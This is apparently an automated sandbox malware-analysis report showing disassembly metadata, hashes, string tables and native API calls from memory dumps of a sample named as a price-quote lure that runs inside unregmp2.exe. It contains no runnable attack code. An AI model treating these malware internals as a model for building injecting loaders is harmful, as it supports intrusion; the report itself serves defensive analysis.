                  • Instruction Fuzzy Hash: 9A3168766002199FDB24DE2DCD90BEEB7F8FF54A50F8445D9E949E3140EB309A44CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction ID: a197c4e029adeff6941bbdfd6b7cfe7289fe17aac877616152593b3324e78c1b
                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction Fuzzy Hash: FC919771E0024A9ADF2CDF5DC8806BF7BA5FF44320FA6469AE955E72C8DF3099408751
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: baf41797a8c1f533dc247f79390e97dbb9726bb3fc0e6c1e4a1e4a3991f57faa
                  • Instruction ID: 29d4d97473717692b59c3b9c9b7a4a30d3a873163a2cb10907a8e5d53dda5adc
                  • Opcode Fuzzy Hash: baf41797a8c1f533dc247f79390e97dbb9726bb3fc0e6c1e4a1e4a3991f57faa
                  • Instruction Fuzzy Hash: 2E811B71D006699BDB35DF54CD45BEABBB4AF48714F0041DAEA1AB7280D7709E84CFA0
                  APIs
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 01B5CFBD
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: CallFilterFunc@8
                  • String ID: @$@4_w@4_w
                  • API String ID: 4062629308-713214301
                  • Opcode ID: 62747e2548aa60c04f0b652f78e245f8122a1273c6bbda3644a20d6cf0730f00
                  • Instruction ID: e0230195d2bbc4399aac883ac41977c6e7dc2d315132ff899427bae441490185
                  • Opcode Fuzzy Hash: 62747e2548aa60c04f0b652f78e245f8122a1273c6bbda3644a20d6cf0730f00
                  • Instruction Fuzzy Hash: F441BC71900215DFCB29AFA9C990BAEBBF8FF58B50F0441AAED05DB264D774C805CB61

                  Execution Graph

                  Execution Coverage:2.6%
                  Dynamic/Decrypted Code Coverage:4.3%
                  Signature Coverage:2.3%
                  Total number of Nodes:442
                  Total number of Limit Nodes:71
96028->96030 96031 be0e21 96029->96031 96034 be9ff0 RtlAllocateHeap 96031->96034 96033 be0e2c 96034->96033 96035 be7f40 96036 be7fac 96035->96036 96038 be7f64 96035->96038 96037 be7fc2 NtDeleteFile 96036->96037

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !'k$"X$#N$#z$'$'r$)$+`$-Q$/$2u)$6Z$:$<l$B?xC$E$H$H$J$M-$P$PT$S$[$\U$]$]$c$cq$d$fT$gu$h$k$l!$p$q8$xC$y${$|$'$0
                  • API String ID: 0-4036846436
                  • Opcode ID: b9ed47ec20846162d8bc5eaf255e7fb66eb45b076eba6e3f18f89ca098c3f39c
                  • Instruction ID: 34348155984ae45c4ce2581d7b8c2d4b73c218062c92883787775ece165f0990
                  • Opcode Fuzzy Hash: b9ed47ec20846162d8bc5eaf255e7fb66eb45b076eba6e3f18f89ca098c3f39c
                  • Instruction Fuzzy Hash: 76529FB0D05229CBEB64CF44C898BDDBBB2BB45308F1481D9D14D6B290CBB95AC9DF46
                  APIs
                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 00BDBEE4
                  • FindNextFileW.KERNELBASE(?,00000010), ref: 00BDBF1F
                  • FindClose.KERNELBASE(?), ref: 00BDBF2A
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: bb53c66e9415eef9ed8cfac4a92c5182dcff2baf30a16be2c8494ab4df996999
                  • Instruction ID: 436bb153342d64a76a78de24f4ce74382c53a7401cf2b0809b205ede8fe1495d
                  • Opcode Fuzzy Hash: bb53c66e9415eef9ed8cfac4a92c5182dcff2baf30a16be2c8494ab4df996999
                  • Instruction Fuzzy Hash: 4A3150B5900348BBDB20DB65CC85FEF77BCDB44744F144599B509A7281EB70AA848BA0
                  APIs
                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00BE7DF3
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ecfe109843e6adbc9789653d124c6213f17cb6b4317e9cde925e34fe65ab8720
                  • Instruction ID: 8ca4be4e8ed4eca7a4c54b38f8dbd649e51098f8fcb22e34796b3401bd194709
                  • Opcode Fuzzy Hash: ecfe109843e6adbc9789653d124c6213f17cb6b4317e9cde925e34fe65ab8720
                  • Instruction Fuzzy Hash: C631E1B5A01208AFCB14DF99D881EEFB7F9AF8C304F108259F918A3341D770A911CBA4
                  APIs
                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00BE7F38
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 4b475c96b3670da1695345ff90d445bc7f9a6db3ada86ecf4cb7af92aad584dd
                  • Instruction ID: 19dc2d0212f27e51b397ad45d5ad6b815be451aee91fbd3a0991d89510494e80
                  • Opcode Fuzzy Hash: 4b475c96b3670da1695345ff90d445bc7f9a6db3ada86ecf4cb7af92aad584dd
                  • Instruction Fuzzy Hash: 4D31E4B5A00209AFCB14DF99D881EEFB7F9EF88314F108259F918A7241D730A9118BA4
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00BD199E,?,00BE6D77,00000000,00000004,00003000,?,?,?,?,?,00BE6D77,00BD199E,00BE6D77,00000000), ref: 00BE81FD
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 4c0ce185ad5d200ae9320498b354b4f0915c368f0ac16ab7953bcb79e85fabda
                  • Instruction ID: 64c320720a0de41df861a2c0d802f212fbff6a49da5f69fd903452403c302b64
                  • Opcode Fuzzy Hash: 4c0ce185ad5d200ae9320498b354b4f0915c368f0ac16ab7953bcb79e85fabda
                  • Instruction Fuzzy Hash: AD2105B5A01248AFDB14EF59DC81FAFB7B9EF89310F008549FD18A7241D770A911CBA5
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: 8f29438b34e29164e242ffc256c12d18e8e931696d74641c76c59d00643db24c
                  • Instruction ID: 898182c7e9ae2b5f45db4a96e65dd92c1e86e1df12d89700bab80532f57a7919
                  • Opcode Fuzzy Hash: 8f29438b34e29164e242ffc256c12d18e8e931696d74641c76c59d00643db24c
                  • Instruction Fuzzy Hash: 8501A171A012447FD624EA69DC02FAB77ACDFC5310F404489FA089B282DBB17904CBE1
                  APIs
                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00BE8017
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
                  • Instruction ID: 126c8adfaffc1d6a4d7a636394f6847d3153ae11f4126aaba4c2142ebe1b6f1e
                  • Opcode Fuzzy Hash: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
                  • Instruction Fuzzy Hash: 28E046326012447BE220EA5ACC01FABB7ACDBC6721F418459FA08A7242CA71B91187E0
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: fad39badb14ec4d516f1b4b17ca3873e1c5b535447f6c7dd1f33782914d97ae5
                  • Instruction ID: 8db2d607b9f6c1566cce7b8f087954a54fcd29c2e6e8fb771080b269254e71d2
                  • Opcode Fuzzy Hash: fad39badb14ec4d516f1b4b17ca3873e1c5b535447f6c7dd1f33782914d97ae5
                  • Instruction Fuzzy Hash: A39002616015004266407158480440660159BE1305395C115B4559671C8A18D965A669
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5d0beda3f29a5baf8d45b2211c2cc677f410747935221b6c099e2e3807cc9ad6
                  • Instruction ID: 10dc399bb2a08e0466f4100077e84f2d5104a6acf85573e28d0b73b06827454d
                  • Opcode Fuzzy Hash: 5d0beda3f29a5baf8d45b2211c2cc677f410747935221b6c099e2e3807cc9ad6
                  • Instruction Fuzzy Hash: 8090023160580012B6407158488454640159BE0305B55C011F4429665C8E14DA666761
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5d65dfceaa93c1f84dfbeb069d150977d13268ddaef011d591950d5f9230f410
                  • Instruction ID: 252b4ecef969e1f9468a4d8d5e4be176a5b4ef823a557428a8d445f283e72e9d
                  • Opcode Fuzzy Hash: 5d65dfceaa93c1f84dfbeb069d150977d13268ddaef011d591950d5f9230f410
                  • Instruction Fuzzy Hash: 4A90023120140402F6007598540864600158BE0305F55D011B9029666ECA65D9A17531
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d8efcf47522231a4f64aa841169cf71ca98dcf602c0687ce7fba558aa5ff851c
                  • Instruction ID: fc09fc4a365883d2d6378bf907eb2f08e07fa7df800a9eb51eb6b4502da180d9
                  • Opcode Fuzzy Hash: d8efcf47522231a4f64aa841169cf71ca98dcf602c0687ce7fba558aa5ff851c
                  • Instruction Fuzzy Hash: CF90023120148802F6107158840474A00158BD0305F59C411B8429769D8A95D9A17521
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 6cc56fef1f9c7bce039937f1dd0cf4789fa646039ef7062d8a3fc64d250f9b7c
                  • Instruction ID: 5836a20f004cd3ea51c668ab748037393e616a5b8b4b71f487e9c76cd5dd4075
                  • Opcode Fuzzy Hash: 6cc56fef1f9c7bce039937f1dd0cf4789fa646039ef7062d8a3fc64d250f9b7c
                  • Instruction Fuzzy Hash: CE90023120140842F60071584404B4600158BE0305F55C016B4129765D8A15D9617921
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 308a6bb29ce6c40a65c2e36fee669ed472aaf6e1eaa7bda4add9a6a907666206
                  • Instruction ID: 8b565e02602531a39735dc669ffdd6ff474b5402a4122c92b6a22ad84ca0fa8b
                  • Opcode Fuzzy Hash: 308a6bb29ce6c40a65c2e36fee669ed472aaf6e1eaa7bda4add9a6a907666206
                  • Instruction Fuzzy Hash: 2B900221242441527A45B158440450740169BE0245795C012B5419A61C8926E966EA21
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: fb876fcde40cec3efc6302f45a3f14f2d5a5e737214ee00e16bf8ddcfe8ce6aa
                  • Instruction ID: 255c6599a54d8ace183c20039e4fbdc48f4be3e5417e6b174eb18ce53d436d95
                  • Opcode Fuzzy Hash: fb876fcde40cec3efc6302f45a3f14f2d5a5e737214ee00e16bf8ddcfe8ce6aa
                  • Instruction Fuzzy Hash: 7A90023120140413F6117158450470700198BD0245F95C412B4429669D9A56DA62B521
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: f009e18c18db38af58981b02b33933d8311b0b1df54b6d583df88c75fc3940a6
                  • Instruction ID: af0e2fccd3ceae1eb08075900f021a2240c9b158c09d01e4f69e1c9f82929b7d
                  • Opcode Fuzzy Hash: f009e18c18db38af58981b02b33933d8311b0b1df54b6d583df88c75fc3940a6
                  • Instruction Fuzzy Hash: C790022921340002F6807158540860A00158BD1206F95D415B401A669CCD15D9796721
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 736477142b363110a1c754ebdb0b6c20af6eda9f3016b1e1ad681a76e1d4e25d
                  • Instruction ID: 55db90c74a9e1f1af6b4c626462c0f325c716d6255521fa07dc0ba3b7b9c0c39
                  • Opcode Fuzzy Hash: 736477142b363110a1c754ebdb0b6c20af6eda9f3016b1e1ad681a76e1d4e25d
                  • Instruction Fuzzy Hash: 4090022130140003F640715854186064015DBE1305F55D011F4419665CDD15D9666622
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: c02e190a1619e49766473661c8bc728ec0fd63deaad254e7fc77007318c39984
                  • Instruction ID: 17fe83f1beca32ba590640aef7e5c36c27fd9d053de71b9eb04074de45e115c4
                  • Opcode Fuzzy Hash: c02e190a1619e49766473661c8bc728ec0fd63deaad254e7fc77007318c39984
                  • Instruction Fuzzy Hash: 4F90026120180403F6407558480460700158BD0306F55C011B6069666E8E29DD617535
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 254e352daa65478ed69546d1fb2b44961d945c268445485631fd84a7037f2906
                  • Instruction ID: 9e12feaf99fea9e50d9eebd8ef5088f2a6b3f13584671b61e7f4168b9fabe183
                  • Opcode Fuzzy Hash: 254e352daa65478ed69546d1fb2b44961d945c268445485631fd84a7037f2906
                  • Instruction Fuzzy Hash: 7F90022160140502F60171584404616001A8BD0245F95C022B5029666ECE25DAA2B531
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 0135e13c67eeef561a94b0484e051899f194af50666ecf29bd91277a499d0bc7
                  • Instruction ID: 786c3375037c027aeb067fbcaacd41e73e20428f51179dce58109dfab7cac71c
                  • Opcode Fuzzy Hash: 0135e13c67eeef561a94b0484e051899f194af50666ecf29bd91277a499d0bc7
                  • Instruction Fuzzy Hash: 1A900221211C0042F70075684C14B0700158BD0307F55C115B4159665CCD15D9716921
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 2c7eaf965a4d1b151662caa6ddb0e2f35456d6c6e5ff0014db3e252cda1e5a52
                  • Instruction ID: 73443a9cfad30f18739619b3200fc98b33111e456fb92b3cf618fa2c3bfb38e2
                  • Opcode Fuzzy Hash: 2c7eaf965a4d1b151662caa6ddb0e2f35456d6c6e5ff0014db3e252cda1e5a52
                  • Instruction Fuzzy Hash: 1E900221601400426640716888449064015AFE1215755C121B499D661D8959D9756A65
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 367c425c771c53c8611aa7b6b2ea6448a90f3e7fec5e67e235871b6b482be3bb
                  • Instruction ID: 46e6f4c681fd907ab2211d90242a25aa28ba67c2cf0ca9afe79f884c90b0c0c3
                  • Opcode Fuzzy Hash: 367c425c771c53c8611aa7b6b2ea6448a90f3e7fec5e67e235871b6b482be3bb
                  • Instruction Fuzzy Hash: AD90026134140442F60071584414B060015CBE1305F55C015F5069665D8A19DD627526
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 990214498b13b0c40a944ff9c08f717658fd4b4705318d6d80bbaed9be712e0b
                  • Instruction ID: 2f7498f57dcaa3ef0cd54417a6e91c350a613d89ba1d01f41bd50439f835f721
                  • Opcode Fuzzy Hash: 990214498b13b0c40a944ff9c08f717658fd4b4705318d6d80bbaed9be712e0b
                  • Instruction Fuzzy Hash: D5900225211400032605B558070450700568BD5355355C021F501A661CDA21D9716521
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 1464ce7f1a24e8aa9305879e7114b31e8239d246c95a0a01b9a82a77f24c2af2
                  • Instruction ID: 38f735042c0e6dd6cb9ea1dc1142861bcb5545827de35578a57d7c2cd35e1a98
                  • Opcode Fuzzy Hash: 1464ce7f1a24e8aa9305879e7114b31e8239d246c95a0a01b9a82a77f24c2af2
                  • Instruction Fuzzy Hash: 58900225221400022645B558060450B04559BD6355395C015F541B6A1CCA21D9756721
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: bccdc0d0ffd4b0e28a38bfca59d25947486ef4acd43b3326d60ad9836851d9db
                  • Instruction ID: d3e96fedc250ba68b6350e69c8cdc56cb141f6f5920d6ef8568273704270e421
                  • Opcode Fuzzy Hash: bccdc0d0ffd4b0e28a38bfca59d25947486ef4acd43b3326d60ad9836851d9db
                  • Instruction Fuzzy Hash: AC90023120140802F6807158440464A00158BD1305F95C015B402A765DCE15DB697BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
